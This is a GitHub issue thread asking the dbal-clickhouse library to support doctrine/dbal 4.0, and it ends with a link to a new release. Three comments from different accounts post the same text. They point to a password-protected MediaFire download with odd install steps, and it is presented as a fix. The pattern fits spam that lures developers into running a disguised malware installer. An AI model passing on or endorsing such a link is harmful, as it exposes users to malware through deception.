### ISSUE TITLE
Add support for doctrine/dbal version 4.0

### ISSUE THREAD

**Issue by jochen-jung** [FriendsOfDoctrine/dbal-clickhouse#68]
Currently only version 2 and 3 seem to be supported.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by asanikovich** [comment]
Done https://github.com/FriendsOfDoctrine/dbal-clickhouse/releases/tag/v3.0.0
